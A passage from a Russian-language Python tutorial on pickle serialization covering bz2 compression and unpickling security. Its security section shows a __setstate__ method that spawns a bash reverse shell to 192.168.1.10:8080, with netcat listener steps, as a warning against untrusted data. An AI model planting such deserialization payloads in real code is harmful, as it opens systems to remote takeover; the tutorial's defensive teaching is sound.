print(my_new_instance.__dict__)
Сжатие сериализованных объектов
Формат данных pickle
является компактным двоичным представлением структуры объекта, но мы всё равно можем её оптимизировать, используя сжатие. Для bzip2-сжатия сериализованной строки можно использовать модуль стандартной библиотеки bz2
:
>>> import pickle
>>> import bz2
>>> my_string = """Хотя формат данных pickle
является компактным двоичным представлением
структуры объекта, мы всё равно можем её
оптимизировать, используя bzip2 или gzip.
Для сжатия сериализованной строки можно
использовать модуль стандартной библиотеки
bz2. При использовании сжатия помните, что
файлы меньшего размера создаются за счет
более медленного алгоритма. И совсем малые
объекты не получают выигрыша при сжатии.
"""
>>> pickled = pickle.dumps(my_string)
>>> compressed = bz2.compress(pickled)
>>> len(my_string)
404
>>> len(compressed)
360
Безопасность отправки данных в формате pickle
Процесс сериализации удобен, когда необходимо сохранить состояние объекта на диск или передать по сети. Однако это не всегда безопасно. Как мы обсудили выше, при десериализации объекта в методе __setstate__()
может выполняться любой произвольный код. В том числе код злоумышленника.
Простое правило гласит: никогда не десериализуйте данные, поступившие из подозрительного источника или ненадёжной сети. Чтобы предотвратить атаку посредника, используйте модуль стандартной библиотеки hmac для создания подписей и их проверки.
В следующем примере показано, как десериализация файла pickle
, присланного злоумышленником, открывает доступ к системе:
import pickle
import os
class foobar:
def __init__(self):
pass
def __getstate__(self):
return self.__dict__
def __setstate__(self, state):
# The attack is from 192.168.1.10
# The attacker is listening on port 8080
os.system('/bin/bash -c
"/bin/bash -i >& /dev/tcp/192.168.1.10/8080 0>&1"')
my_foobar = foobar()
my_pickle = pickle.dumps(my_foobar)
my_unpickle = pickle.loads(my_pickle)
В этом примере в процессе распаковки в __setstate__()
будет выполнена команда Bash, открывающая удалённую оболочку для компьютера 192.168.1.10
через порт 8080
.
Вы можете протестировать этот скрипт на Mac или Linux, открыв терминал и набрав команду nc
для прослушивания порта 8080
:
$ nc -l 8080
Это будет терминал атакующего. Затем открываем терминал на том же компьютере (или другом компьютере той же сети) и выполняем приведённый код Python. IP-адрес в коде нужно заменить на IP-адрес атакующего терминала. Выполнив следующую команду, жертва предоставит атакующему доступ:
$ python remote.py
При запуске скрипта жертвой в терминале злоумышленника оболочка Bash перейдёт в активное состояние:
$ nc -l 8080
bash: no job control in this shell
Эта консоль позволить атакующему работать непосредственно на вашей системе.
Заключение
Теперь вы знаете, как работать с модулями pickle
и dill
для преобразования иерархии объектов со сложной структурой в поток байтов. Структуры можно сохранять на диск или передавать в виде байтовой строки по сети. Вы также знаете, что процесс десериализации нужно использовать с осторожностью. Если у вас остались вопросы, задайте их в комментарии под постом.